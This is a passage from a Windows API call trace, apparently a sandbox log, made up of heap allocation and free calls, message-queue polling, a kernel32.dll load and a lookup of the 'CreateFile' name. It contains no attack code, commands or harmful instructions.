dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0172.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0172.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0172.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0172.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0172.087] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0172.087] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0172.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0172.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0172.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0172.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0172.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6cd8 | out: hHeap=0x8a0000) returned 1 [0172.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0172.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0172.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0172.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0172.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0172.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0172.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0172.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0172.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0172.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0172.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0172.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0172.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0172.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0172.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0172.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0172.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0172.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0172.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0172.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0172.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0172.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0172.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0172.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0172.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0172.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0172.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0172.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0172.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0172.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0172.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0172.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0172.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0172.089] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0172.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0172.089] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0172.089] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0172.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0172.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0172.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0172.089] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0172.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0172.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0172.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0172.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b30 [0172.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0172.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0172.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0172.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0172.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0172.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0172.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0172.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd468 [0172.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0172.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0172.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0172.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0172.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0172.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0172.090] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0172.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0172.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0172.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0172.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0172.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0172.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0172.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0172.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0172.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0172.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0172.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0172.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0172.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0172.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0172.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0172.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0172.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0172.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0172.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0172.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0172.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0172.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0172.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0172.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0172.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0172.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0172.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0172.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0172.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0172.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0172.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0172.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0172.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0172.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0172.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0172.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0172.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0172.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0172.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0172.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0172.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0172.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0172.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0172.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0172.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0172.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0172.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0172.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0172.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0172.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0172.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0172.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0172.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0172.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0172.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0172.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0172.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0172.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0172.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0172.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0172.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0172.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0172.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0172.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0172.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0172.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0172.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0172.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0172.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0172.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0172.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0172.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0172.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0172.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0172.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0172.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0172.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0172.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0172.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0172.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0172.094] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0172.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0172.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0172.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0172.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0172.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0172.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0172.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0172.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0172.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0172.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0172.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0172.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0172.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0172.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0172.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0172.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0172.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0172.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0172.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0172.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0172.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0172.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0172.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0172.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0172.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0172.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0172.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0172.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0172.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0172.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0172.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0172.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0172.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0172.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0172.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0172.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0172.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0172.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0172.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0172.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0172.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0172.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0172.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0172.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0172.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0172.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0172.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0172.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0172.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0172.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0172.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0172.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0172.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0172.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0172.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0172.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0172.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0172.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0172.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0172.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0172.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0172.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0172.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0172.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0172.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0172.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0172.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0172.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0172.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0172.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0172.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0172.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0172.097] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0172.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0172.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0172.097] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0172.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9ba0c0 [0172.097] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9ba0c0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0172.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: 